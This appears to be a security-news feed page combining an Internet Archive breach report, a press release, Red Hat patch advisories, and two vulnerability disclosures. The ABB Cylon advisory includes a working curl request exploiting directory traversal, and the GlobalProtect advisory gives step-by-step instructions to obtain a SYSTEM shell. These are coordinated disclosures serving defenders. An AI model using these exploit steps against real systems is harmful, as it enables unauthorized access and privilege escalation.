Internet Archive suffered a massive cyberattack, leading to a data breach where 31 million user records were stolen…

Internet Archive suffered a massive cyberattack, leading to a data breach where 31 million user records were stolen and shared on HaveIBeenPwned (HIBP).

The internet’s historical treasure trove, the Internet Archive, has been hit by a devastating cyberattack leading to a data breach, compromising the personal information of 31 million users. The attack unfolded dramatically: Visitors to archive.org were greeted by a pop-up message, seemingly from the hackers themselves. It read:

> “Have you ever felt like the Internet Archive runs on sticks and is constantly on the verge of suffering a catastrophic security breach? It just happened. See 31 million of you on HIBP!”

This cryptic message hinted at the severity of the situation. Troy Hunt, founder of HaveIbeenPwned (HIBP), revealed that a hacker shared a 6.4GB database with him, containing authentication information for registered members. 

Screenshot from Archive.org displaying the message left by hackers

For your information, HIBP, short for “Have I Been Pwned,” is a website that allows users to check if their email addresses have been leaked in data breaches.

According to Troy, the 6.4GB database contains user information, including email addresses, usernames, timestamps of password changes (with the most recent being September 28th), and even encrypted passwords.

The attack went beyond data theft. The Internet Archive also faced a Distributed Denial-of-Service Attack (**DDoS Attack**), overwhelming the website with traffic and making it inaccessible to users.

A pro-Palestinian hacktivist group DarkMeta claimed responsibility for the DDoS attack in a post on X, citing the Archive’s supposed affiliation with the US government as the reason. However, the Internet Archive is a non-profit organization founded by Brewster Kahle (co-founder of Wayback Machine) and the site has no affiliation with the government.  

On their X (Twitter) account, Kehle confirmed DDoS attacks on the website. In a tweet at 2:08 AM, Oct 10, 2024, Kehle said they mitigated a DDoS attack. However, in a tweet sent out just 3 hours ago at 11:36 AM, Oct 10, 2024, Kehle revealed they are facing more DDoS attacks and the website **Archive.org** and **Openlibrary.org**, an online project intended to create “one web page for every book ever published” have been offline.

At the time of writing both sites were offline. Nevertheless, the full picture of the attack remains unclear as it is a developing story. While the DDoS attack and data breach seem coordinated, the connection is not definitive.

**Jake Moore**, Global Cybersecurity Advisor, ESET weighed in on the situation, highlighting the broader implications of the breach.“Hacking the past is usually technically impossible but this data breach is the closest we may ever come to it.”

“The stolen dataset includes personal information but at least the stolen passwords are encrypted, however, it’s a good reminder to make sure all your passwords are unique as even encrypted passwords can be cross-references against previous uses of it,” Jake explained.

“Have I Been Pwned is a fantastic free service that can be used after a breach. It securely contains millions of breached usernames and passwords for people to safely check their credentials against the database to check if they have ever been caught up in a breach.” “If you find your data in any known breaches, it would be a good idea to change those passwords and implement multi-factor authentication,” he advised.

Stay tuned, this article will be updated accordingly.

1.  **DDoS Attacks Hit France Over Telegram’s Pavel Durov Arrest**
2.  **Archive of Our Own Website Suffering Massive DDoS Attacks**
3.  **Panamorfi DDoS Attack Exploits Misconfigured Jupyter Notebooks**
4.  **Misconfigured AWS bucket exposed 421GB of Artwork Archive data**
5.  **Examining the US Government’s DDoS Protection Guidance Update**

Internet Archive (Archive.Org) Hacked: 31 Million Accounts Compromised

ABB Cylon Aspect version 3.08.01 has a directory traversal vulnerability that can be exploited by an unauthenticated attacker to list the contents of arbitrary directories without reading file contents, leading to information disclosure of directory structures and filenames. This may expose sensitive system details, aiding in further attacks. The issue lies in the listFiles() function of the persistenceManagerAjax.php script, which calls PHP's readdir() function without proper input validation of the directory POST parameter.

    ABB Cylon Aspect 3.08.01 (persistenceManagerAjax.php) Directory TraversalVendor: ABB Ltd.Product web page: https://www.global.abbAffected version: NEXUS Series, MATRIX-2 Series, ASPECT-Enterprise, ASPECT-Studio                  Firmware: <=3.08.01Summary: ASPECT is an award-winning scalable building energy managementand control solution designed to allow users seamless access to theirbuilding data through standard building protocols including smart devices.Desc: The BMS/BAS controller has a directory traversal vulnerability thatcan be exploited by an unauthenticated attacker to list the contents ofarbitrary directories without reading file contents, leading to informationdisclosure of directory structures and filenames. This may expose sensitivesystem details, aiding in further attacks. The issue lies in the listFiles()function of the persistenceManagerAjax.php script, which calls PHP's readdir()function without proper input validation of the 'directory' POST parameter.Tested on: GNU/Linux 3.15.10 (armv7l)           GNU/Linux 3.10.0 (x86_64)           GNU/Linux 2.6.32 (x86_64)           Intel(R) Atom(TM) Processor E3930 @ 1.30GHz           Intel(R) Xeon(R) Silver 4208 CPU @ 2.10GHz           PHP/7.3.11           PHP/5.6.30           PHP/5.4.16           PHP/4.4.8           PHP/5.3.3           AspectFT Automation Application Server           lighttpd/1.4.32           lighttpd/1.4.18           Apache/2.2.15 (CentOS)           OpenJDK Runtime Environment (rhel-2.6.22.1.-x86_64)           OpenJDK 64-Bit Server VM (build 24.261-b02, mixed mode)Vulnerability discovered by Gjoko 'LiquidWorm' Krstic                            @zeroscienceAdvisory ID: ZSL-2024-5837Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2024-5837.php21.04.2024--$ cat project                 P   R   O   J   E   C   T                        .|                        | |                        |'|            ._____                ___    |  |            |.   |' .---"|        _    .-'   '-. |  |     .--'|  ||   | _|    |     .-'|  _.|  |    ||   '-__  |   |  |    ||      |     |' | |.    |    ||       | |   |  |    ||      | ____|  '-'     '    ""       '-'   '-.'    '`      |____░▒▓███████▓▒░░▒▓███████▓▒░ ░▒▓██████▓▒░░▒▓█▓▒░▒▓███████▓▒░  ░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ ░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ ░▒▓███████▓▒░░▒▓███████▓▒░░▒▓████████▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ ░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ ░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ ░▒▓███████▓▒░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░                                                                     ░▒▓████████▓▒░▒▓██████▓▒░ ░▒▓██████▓▒░          ░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░         ░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░░░░░░          ░▒▓██████▓▒░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒▒▓███▓▒░         ░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░         ░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░         ░▒▓█▓▒░░░░░░░░▒▓██████▓▒░ ░▒▓██████▓▒░                                                                                                                                                              $ curl "http://192.168.73.31/persistenceManagerAjax.php" \> -d "command=justList\> &directory=./lib/" \> | sed -e 's/.*\[$.*$\].*/\1/' \> | tr -d '\' \> | sed '1,1d' \> | sed '$d'INI.phpJSON.phpaspect-status.inccaldav-checksums.inccheckForLineFeed.phpcheck_networking.phpcommands.incconfigParameter.phpdatetime_includes.incerrorCall.phpfileDownload.phpfileUpload.incformOptions.phpgetUrlStatus.phpinString.phpjsFunctions.phpmatrix-php.incobtainPorts.phpphpCheck.phpphpTimezone.php

ABB Cylon Aspect 3.08.01 persistenceManagerAjax.php Directory Traversal

Palo Alto Networks GlobalProtect versions 5.1.x, 5.2.x, 6.0.x, 6.1.x, 6.3.x and versions less than 6.2.5 suffer from a local privilege escalation vulnerability.

SEC Consult Vulnerability Lab Security Advisory < 20241009-0 >  
=======================================================================  
              title: Local Privilege Escalation via MSI installer  
            product: Palo Alto Networks GlobalProtect  
 vulnerable version: 5.1.x, 5.2.x, 6.0.x, 6.1.x, <6.2.5, 6.3.x  
      fixed version: >=6.2.5, all other versions are not patched yet  
         CVE number: CVE-2024-9473  
             impact: high  
           homepage: https://docs.paloaltonetworks.com/globalprotect  
              found: 2023-11-16  
                 by: Michael Baer (Office Fürth)  
                     SEC Consult Vulnerability Lab 

                     An integrated part of SEC Consult, an Eviden business  
                     Europe | Asia

                     https://www.sec-consult.com

=======================================================================

Vendor description:  
-------------------  
"GlobalProtect enables you to use Palo Alto Networks next-gen firewalls or  
Prisma Access to secure your mobile workforce."

Source: https://docs.paloaltonetworks.com/globalprotect

Business recommendation:  
------------------------  
The vendor provides a patched version v6.2.5 which should be installed immediately.  
Further affected branches will be patched by the vendor in the future, except  
branch 5.2.x which is EOL. Users are urged to upgrade to the most recent versions.

SEC Consult highly recommends to perform a thorough security review of the  
product conducted by security professionals to identify and resolve potential  
further security issues.

Vulnerability overview/description:  
-----------------------------------  
1) Local Privilege Escalation via MSI installer (CVE-2024-9473)  
The configuration of the GlobalProtect MSI installer file was found to  
produce a visible conhost.exe window running as the SYSTEM user when using   
the repair function of msiexec.exe. This allows a local, low-privileged  
attacker to use a chain of actions, to open a fully functional cmd.exe  
with the privileges of the SYSTEM user. 

Proof of concept:  
-----------------  
1) Local Privilege Escalation via MSI installer (CVE-2024-9473)  
For the exploit to work, GlobalProtect has to be installed via the MSI file.  
Afterwards, any low-privileged user can start the repair of GlobalProtect by  
double-clicking the installer and trigger the vulnerable actions  
without a UAC popup. The installer, if deleted from it's original location,  
can be found in C:\Windows\Installer with a randomized name.

During the repair process, the subprocess PanVCrediChecker.exe gets  
called with SYSTEM privileges and performs a read action on the file   
"C:\Program Files\Palo Alto Networks\GlobalProtect\libeay32.dll".

This can be used by an attacker by simply setting an oplock on the file.  
As soon as it gets read, the process is blocked until the lock is released.  
To do that, one can use the 'SetOpLock.exe' tool from  
"https://github.com/googleprojectzero/symboliclink-testing-tools"  
with the following parameters:

SetOpLock.exe "C:\Program Files\Palo Alto Networks\GlobalProtect\libeay32.dll" x  
See figure 1 [lock.webp]

During the repair process, the locked file is accessed several times. The lock  
has to be released by pressing ENTER five times before the conhost.exe  
window opens. For the sixth request, the lock should not be released to keep the  
window open. The conhost window that gets opened when PanVcrediChecker.exe is  
executed doesn't close and can then be interacted with.

The attacker can then perform the following actions to   
spawn a SYSTEM shell:  
- Right click on the top bar of the window  
- Click on properties [ see figure 2 openbrowser.webp]  
- Under options, click on the "new console features" link [see figure 2  
    openbrowser.webp]  
- Open the link with e.g. firefox or chrome [see figure 2 openbrowser.webp]  
- In the opened browser window press the key combination CTRL+o  
- Type cmd.exe in the top bar and press Enter [see figure 3 cmd.webp]

Note that this does not work using a recent version of the Edge Browser.

Vulnerable / tested versions:  
-----------------------------  
The following versions have been tested which were the only versions  
available to SEC Consult at the time of the test. SEC Consult was not  
entirely sure, which exact version the product was:  
- ProductVersion as stated by the PropertyTable: 5.2.10  
- Version as stated by Windows after installing: 5.1.5  
- 6.1.2 is affected as well

The vendor confirmed that versions <6.2.5 are affected. Furthermore,  
all other branches 5.1.x, 5.2.x, 6.0.x, 6.1.x and 6.3.x are affected  
as well. Branch 5.2.x is end of life according to the vendor and will  
not be patched.

Vendor contact timeline:  
------------------------  
2023-11-17: Contacting vendor through PSIRT@PaloAltoNetworks.com  
            asking for most recent software version  
2023-11-21: Vendor confirms receipt of contact  
2023-11-23: Vendor denies providing most recent version and asks for  
            full technical report via their online form:  
            https://security.paloaltonetworks.com/report  
            Note: Submitting the advisory draft via online form  
            repeatedly results in server errors  
2023-11-23: Sending the advisory via PSIRT@PaloAltoNetworks.com  
2024-01-11: Contacting vendor through PSIRT@PaloAltoNetworks.com  
            asking for confirmation of receiving the advisory and  
            status of their triage.  
2024-01-12: Vendor confirms receiving the advisory.  
            The issue is tracked internally.  
2024-03-06: Contacting vendor through PSIRT@PaloAltoNetworks.com   
            asking for update of the vulnerability.  
2024-04-02: The vendor notifies that the product team is working  
            on the report.  
2024-04-08: Asking vendor to notify about updates and the timeline  
            of a fix.  
2024-04-24: Vendor was able to reproduce the issue, but not in the  
            most recent versions. 5.1.5 is affected, but not 5.2.10  
            nor 5.1.12, nor 6.2.2.  
2024-05-23: Asking vendor about affected/fixed versions and regarding  
            CVE number.  
2024-05-30: Vendor apologizes for version confusion, following up with team  
            internally. Vendor plans to publish an advisory with CVE, but  
            no date yet, asks us to wait/coordinate our advisory with theirs.  
2024-06-03: Answering that we will wait for their release & advisory.  
2024-06-17: Asking for a status update regarding the version numbers &  
            advisory release.  
            Vendor: no ETA/timeline yet, no version information.  
2024-09-25: Asking for a status update regarding the vendor advisory and for  
            confirmation of the available fixes.  
2024-09-27: Vendor investigated further and previous versions are unfortunately  
            affected as well. Product team works on a fix, advisory & CVE  
            release scheduled for 9th October 9 AM PT.  
2024-09-27: Acknowledging the coordinated advisory release for 9th October.  
2024-10-03: Vendor communicates further information regarding affected versions  
            and their advisory draft.  
2024-10-07: Vendor confirms 5.2.x as affected as well, but is EOL without fix.  
2024-10-09: Coordinated release of security advisory.

Solution:  
---------  
The vendor provides an updated version v6.2.5 which fixes the issues for this  
specific branch. Other versions are not yet patched and will be fixed in future  
releases.

Further information can be found at the vendor's website.  
https://security.paloaltonetworks.com

Users are urged to upgrade to the latest version and remove old versions  
of the MSI installer, especially users of v5.2.x as this branch is EOL and won't  
receive an update.

SEC Consult has also released a blog post on 12th September 2024 regarding MSI  
installer security issues tracked as CVE-2024-38014 and a general fix by  
Microsoft. We have contacted Microsoft to have a more general solution for  
every affected vendor. For further details check out the blog post:  
https://r.sec-consult.com/msi

Workaround:  
-----------  
None

Advisory URL:  
-------------  
https://sec-consult.com/vulnerability-lab/

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

SEC Consult Vulnerability Lab   
An integrated part of SEC Consult, an Eviden business  
Europe | Asia

About SEC Consult Vulnerability Lab  
The SEC Consult Vulnerability Lab is an integrated part of SEC Consult, an  
Eviden business. It ensures the continued knowledge gain of SEC Consult in the  
field of network and application security to stay ahead of the attacker. The  
SEC Consult Vulnerability Lab supports high-quality penetration testing and  
the evaluation of new offensive and defensive technologies for our customers.  
Hence our customers obtain the most current information about vulnerabilities  
and valid recommendation about the risk profile of new technologies.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
Interested to work with the experts of SEC Consult?  
Send us your application https://sec-consult.com/career/

Interested in improving your cyber security with the experts of SEC Consult?  
Contact our local offices https://sec-consult.com/contact/  
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Mail: security-research at sec-consult dot com  
Web: https://www.sec-consult.com  
Blog: https://blog.sec-consult.com  
Twitter: https://twitter.com/sec_consult

EOF Michael Baer, Johannes Greil / 2024

Palo Alto Networks GlobalProtect Local Privilege Escalation

Boston and London, U.S. and U.K., 10th October 2024, CyberNewsWire

**Boston and London, U.S. and U.K., October 10th, 2024, CyberNewsWire**

The agreement has marked over 600,000 fraudulent domains for takedown in just two months through automated defense and proactive prevention. Abusix and Red Sift to hold exclusive webinar sharing insights on transforming cyber attack mitigation.

Abusix, an organization specializing in internet abuse prevention, and Red Sift, a leader in misconfiguration and exposure management, have announced a new partnership aiming to transform how organizations can navigate from a reactive to a proactive approach for managing security risk.

Cyber threats such as email phishing, business email compromise (BEC), and brand impersonation remain persistent challenges for organizations globally. Addressing these issues requires both visibility and automation to enable faster detection and mitigation of such attacks.

Addressing these challenges head on, Abusix and Red Sift’s partnership aims to offer security teams visibility and action to neutralize risks preemptively. Since the agreement was enabled in August 2024, over 630,000+ domains have been marked for takedown. This outcome is attributed to Abusix’s real-time reporting capabilities for the swift identification of potential threats, and Red Sift’s ability to transform data into actionable defenses and real-time value for its customers. This is enabled through Red Sift leveraging Abusix’s data in both Red Sift OnDMARC and Red Sift Brand Trust. 

> **Rahul Powar, CEO and Co-Founder of Red Sift said:** “We find ourselves in an ever changing landscape where new attacks and methods for cyber abuse are ever prevalent. Working together with Abusix, we are harnessing new innovation and knowledge sharing to offer increased visibility to a wider remit of large enterprises and small businesses that are vulnerable to cyber threat. This in turn allows us to provide real-time solutions to mitigate against costly reputational damage and shift the industry’s approach from reactive to proactive.” 

> **Tobias Knecht, CEO and Founder of Abusix said:** “It’s not just about sharing data—it’s about sharing it with the right organizations. 95% of all attacks on enterprises originate from service provider and hosting provider networks. Enabling rapid takedowns by sharing actionable intelligence with service providers and hosting providers is a crucial step in reducing overall attack volume at its core. Through our partnership with Red Sift and their unique data solutions, we are taking a significant step forward in safeguarding the internet and improving network security overall.”

The newly formed collaboration is a move to raise the effectiveness and application use of email threat data for cybersecurity across the board and to upgrade the industry’s approach to attack mitigation. Together, the two companies are addressing ongoing critical gaps in the cybersecurity landscape by addressing crucial business needs for increased domain security and prevention of brand abuse. 

Those interested can join an exclusive webinar to learn how Abusix and Red Sift are transforming cyber attack mitigation — readers can reserve a spot today and hear about proactive strategies to protect organizations from email phishing, brand impersonation, and other emerging threats.

Readers can also learn more about the partnership’s Success Story here.

****About Abusix****

Abusix transforms vast amounts of real-time data into actionable insights, helping organizations protect against cyber threats. Its unique data ecosystem enables security teams across all sectors to proactively mitigate attacks by pinpointing the origins of cyber abuse. By enabling collaboration between enterprises, security vendors, and service providers, Abusix works to reduce the overall volume of attacks, driving a more secure internet. 

Abusix serves a global client base, including Cloudflare, Amazon Web Services (AWS), Vodafone, Digital Ocean, and multiple government organizations worldwide. Dedicated to enhancing the global security ecosystem, Abusix continues to make threat intelligence accessible and impactful across industries. Readers can learn more at abusix.com

****About Red Sift****

Red Sift aims to enable organizations to anticipate, respond to, and recover from cyber attacks while continuing to operate effectively. The award-winning Red Sift Pulse Platform is an integrated solution that combines four interoperable applications, internet-scale cybersecurity intelligence, and innovative generative AI that intends to put organizations on a path to cyber resilience. 

Red Sift is a global organization supported by a diverse team across 15 countries. It boasts an international client roster that includes Capgemini, Domino’s, ZoomInfo, Athletic Greens, and several leading law firms. Red Sift is the official DMARC provider for Cisco and a trusted partner for Microsoft and Entrust, among others. Readers can learn more at redsift.com

**Contact**

**Head of Marketing**  
**Serena Li**  
**Abusix**  
**\[email protected\]**

Abusix and Red Sift Form New Partnership, Leveraging Automation to Mitigate Cyber Attacks

Red Hat Security Advisory 2024-7958-03 - An update for firefox is now available for Red Hat Enterprise Linux 9. Issues addressed include a use-after-free vulnerability.

    The following advisory data is extracted from:https://security.access.redhat.com/data/csaf/v2/advisories/2024/rhsa-2024_7958.jsonRed Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.- Packet Storm Staff====================================================================Red Hat Security AdvisorySynopsis:           Important: firefox security updateAdvisory ID:        RHSA-2024:7958-03Product:            Red Hat Enterprise LinuxAdvisory URL:       https://access.redhat.com/errata/RHSA-2024:7958Issue date:         2024-10-10Revision:           03CVE Names:          CVE-2024-9680====================================================================Summary: An update for firefox is now available for Red Hat Enterprise Linux 9.Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.Description:Mozilla Firefox is an open-source web browser, designed for standards compliance, performance, and portability.Security Fix(es):* firefox: Use-after-free in Animation timeline (128.3.1 ESR Chemspill) (CVE-2024-9680)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.Solution:https://access.redhat.com/articles/11258CVEs:CVE-2024-9680References:https://access.redhat.com/security/updates/classification/#importanthttps://bugzilla.redhat.com/show_bug.cgi?id=2317442

Red Hat Security Advisory 2024-7958-03

Red Hat Security Advisory 2024-7856-03 - An update for thunderbird is now available for Red Hat Enterprise Linux 8.2 Advanced Update Support. Issues addressed include bypass and denial of service vulnerabilities.

The following advisory data is extracted from:

https://security.access.redhat.com/data/csaf/v2/advisories/2024/rhsa-2024_7856.json

Red Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.

- Packet Storm Staff

====================================================================  
Red Hat Security Advisory

Synopsis:           Important: thunderbird security update  
Advisory ID:        RHSA-2024:7856-03  
Product:            Red Hat Enterprise Linux  
Advisory URL:       https://access.redhat.com/errata/RHSA-2024:7856  
Issue date:         2024-10-09  
Revision:           03  
CVE Names:          CVE-2024-9392  
====================================================================

Summary: 

An update for thunderbird is now available for Red Hat Enterprise Linux 8.2 Advanced Update Support.

Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.

Description:

Mozilla Thunderbird is a standalone mail and newsgroup client.

Security Fix(es):

* thunderbird: 115.16/128.3 ()

* firefox: thunderbird: Specially crafted WebTransport requests could lead to denial of service (CVE-2024-9399)

* firefox: thunderbird: Memory safety bugs fixed in Firefox 131 and Thunderbird 131 (CVE-2024-9403)

* firefox: thunderbird: Potential directory upload bypass via clickjacking (CVE-2024-9397)

* firefox: thunderbird: Memory safety bugs fixed in Firefox 131, Firefox ESR 115.16, Firefox ESR 128.3, Thunderbird 131, and Thunderbird 128.3 (CVE-2024-9401)

* firefox: thunderbird: Memory safety bugs fixed in Firefox 131, Firefox ESR 128.3, Thunderbird 131, and Thunderbird 128.3 (CVE-2024-9402)

* firefox: thunderbird: External protocol handlers could be enumerated via popups (CVE-2024-9398)

* firefox: thunderbird: Potential memory corruption during JIT compilation (CVE-2024-9400)

* firefox: thunderbird: Potential memory corruption may occur when cloning certain objects (CVE-2024-9396)

* firefox: thunderbird: Cross-origin access to PDF contents through multipart responses (CVE-2024-9393)

* firefox: thunderbird: Cross-origin access to JSON contents through multipart responses (CVE-2024-9394)

* firefox: thunderbird: Compromised content process can bypass site isolation (CVE-2024-9392)

For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.

Solution:

https://access.redhat.com/articles/11258

CVEs:

CVE-2024-9392

References:

https://access.redhat.com/security/updates/classification/#important  
https://bugzilla.redhat.com/show_bug.cgi?id=2314431  
https://bugzilla.redhat.com/show_bug.cgi?id=2315945  
https://bugzilla.redhat.com/show_bug.cgi?id=2315947  
https://bugzilla.redhat.com/show_bug.cgi?id=2315949  
https://bugzilla.redhat.com/show_bug.cgi?id=2315950  
https://bugzilla.redhat.com/show_bug.cgi?id=2315951  
https://bugzilla.redhat.com/show_bug.cgi?id=2315952  
https://bugzilla.redhat.com/show_bug.cgi?id=2315953  
https://bugzilla.redhat.com/show_bug.cgi?id=2315954  
https://bugzilla.redhat.com/show_bug.cgi?id=2315956  
https://bugzilla.redhat.com/show_bug.cgi?id=2315957  
https://bugzilla.redhat.com/show_bug.cgi?id=2315959

Red Hat Security Advisory 2024-7856-03

Red Hat Security Advisory 2024-7854-03 - An update for thunderbird is now available for Red Hat Enterprise Linux 8.4 Advanced Mission Critical Update Support, Red Hat Enterprise Linux 8.4 Update Services for SAP Solutions, and Red Hat Enterprise Linux 8.4 Telecommunications Update Service. Issues addressed include bypass and denial of service vulnerabilities.

The following advisory data is extracted from:

https://security.access.redhat.com/data/csaf/v2/advisories/2024/rhsa-2024_7854.json

Red Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.

- Packet Storm Staff

====================================================================  
Red Hat Security Advisory

Synopsis:           Important: thunderbird security update  
Advisory ID:        RHSA-2024:7854-03  
Product:            Red Hat Enterprise Linux  
Advisory URL:       https://access.redhat.com/errata/RHSA-2024:7854  
Issue date:         2024-10-09  
Revision:           03  
CVE Names:          CVE-2024-9392  
====================================================================

Summary: 

An update for thunderbird is now available for Red Hat Enterprise Linux 8.4 Advanced Mission Critical Update Support, Red Hat Enterprise Linux 8.4 Update Services for SAP Solutions, and Red Hat Enterprise Linux 8.4 Telecommunications Update Service.

Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.

Description:

Mozilla Thunderbird is a standalone mail and newsgroup client.

Security Fix(es):

* thunderbird: 115.16/128.3 ()

* firefox: thunderbird: Specially crafted WebTransport requests could lead to denial of service (CVE-2024-9399)

* firefox: thunderbird: Memory safety bugs fixed in Firefox 131 and Thunderbird 131 (CVE-2024-9403)

* firefox: thunderbird: Potential directory upload bypass via clickjacking (CVE-2024-9397)

* firefox: thunderbird: Memory safety bugs fixed in Firefox 131, Firefox ESR 115.16, Firefox ESR 128.3, Thunderbird 131, and Thunderbird 128.3 (CVE-2024-9401)

* firefox: thunderbird: Memory safety bugs fixed in Firefox 131, Firefox ESR 128.3, Thunderbird 131, and Thunderbird 128.3 (CVE-2024-9402)

* firefox: thunderbird: External protocol handlers could be enumerated via popups (CVE-2024-9398)

* firefox: thunderbird: Potential memory corruption during JIT compilation (CVE-2024-9400)

* firefox: thunderbird: Potential memory corruption may occur when cloning certain objects (CVE-2024-9396)

* firefox: thunderbird: Cross-origin access to PDF contents through multipart responses (CVE-2024-9393)

* firefox: thunderbird: Cross-origin access to JSON contents through multipart responses (CVE-2024-9394)

* firefox: thunderbird: Compromised content process can bypass site isolation (CVE-2024-9392)

For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.

Solution:

https://access.redhat.com/articles/11258

CVEs:

CVE-2024-9392

References:

https://access.redhat.com/security/updates/classification/#important  
https://bugzilla.redhat.com/show_bug.cgi?id=2314431  
https://bugzilla.redhat.com/show_bug.cgi?id=2315945  
https://bugzilla.redhat.com/show_bug.cgi?id=2315947  
https://bugzilla.redhat.com/show_bug.cgi?id=2315949  
https://bugzilla.redhat.com/show_bug.cgi?id=2315950  
https://bugzilla.redhat.com/show_bug.cgi?id=2315951  
https://bugzilla.redhat.com/show_bug.cgi?id=2315952  
https://bugzilla.redhat.com/show_bug.cgi?id=2315953  
https://bugzilla.redhat.com/show_bug.cgi?id=2315954  
https://bugzilla.redhat.com/show_bug.cgi?id=2315956  
https://bugzilla.redhat.com/show_bug.cgi?id=2315957  
https://bugzilla.redhat.com/show_bug.cgi?id=2315959

Red Hat Security Advisory 2024-7854-03

Red Hat Security Advisory 2024-7594-03 - Red Hat OpenShift Container Platform release 4.15.36 is now available with updates to packages and images that fix several bugs and add enhancements. Issues addressed include code execution and out of bounds write vulnerabilities.

The following advisory data is extracted from:

https://security.access.redhat.com/data/csaf/v2/advisories/2024/rhsa-2024_7594.json

Red Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.

- Packet Storm Staff

====================================================================  
Red Hat Security Advisory

Synopsis:           Important: OpenShift Container Platform 4.15.36 security update  
Advisory ID:        RHSA-2024:7594-03  
Product:            Red Hat OpenShift Enterprise  
Advisory URL:       https://access.redhat.com/errata/RHSA-2024:7594  
Issue date:         2024-10-10  
Revision:           03  
CVE Names:          CVE-2024-2961  
====================================================================

Summary: 

Red Hat OpenShift Container Platform release 4.15.36 is now available with updates to packages and images that fix several bugs and add enhancements.

This release includes a security update for Red Hat OpenShift Container Platform 4.15.

Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.

Description:

Red Hat OpenShift Container Platform is Red Hat's cloud computing Kubernetes application platform solution designed for on-premise or private cloud deployments.

This advisory contains the container images for Red Hat OpenShift Container Platform 4.15.36. There are no RPM packages for this release.

Space precludes documenting all of the container images in this advisory. See the following Release Notes documentation, which will be updated shortly for this release, for details about these changes:

https://docs.openshift.com/container-platform/4.15/release_notes/ocp-4-15-release-notes.html

Security Fix(es):

* glibc: Out of bounds write in iconv may lead to remote code execution  
(CVE-2024-2961)  
* openstack-ironic: Specially crafted image may allow authenticated users  
to gain access to potentially sensitive data (CVE-2024-44082)

For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.  
All OpenShift Container Platform 4.15 users are advised to upgrade to these updated packages and images when they are available in the appropriate release channel. To check for available updates, use the OpenShift CLI (oc) or web console. Instructions for upgrading a cluster are available at https://docs.openshift.com/container-platform/4.15/updating/updating_a_cluster/updating-cluster-cli.html

Solution:

CVEs:

CVE-2024-2961

References:

https://access.redhat.com/security/updates/classification/#important  
https://bugzilla.redhat.com/show_bug.cgi?id=2273404  
https://bugzilla.redhat.com/show_bug.cgi?id=2309331  
https://issues.redhat.com/browse/OCPBUGS-38086  
https://issues.redhat.com/browse/OCPBUGS-38764  
https://issues.redhat.com/browse/OCPBUGS-39343  
https://issues.redhat.com/browse/OCPBUGS-39395  
https://issues.redhat.com/browse/OCPBUGS-41800  
https://issues.redhat.com/browse/OCPBUGS-41991  
https://issues.redhat.com/browse/OCPBUGS-42114  
https://issues.redhat.com/browse/OCPBUGS-42284  
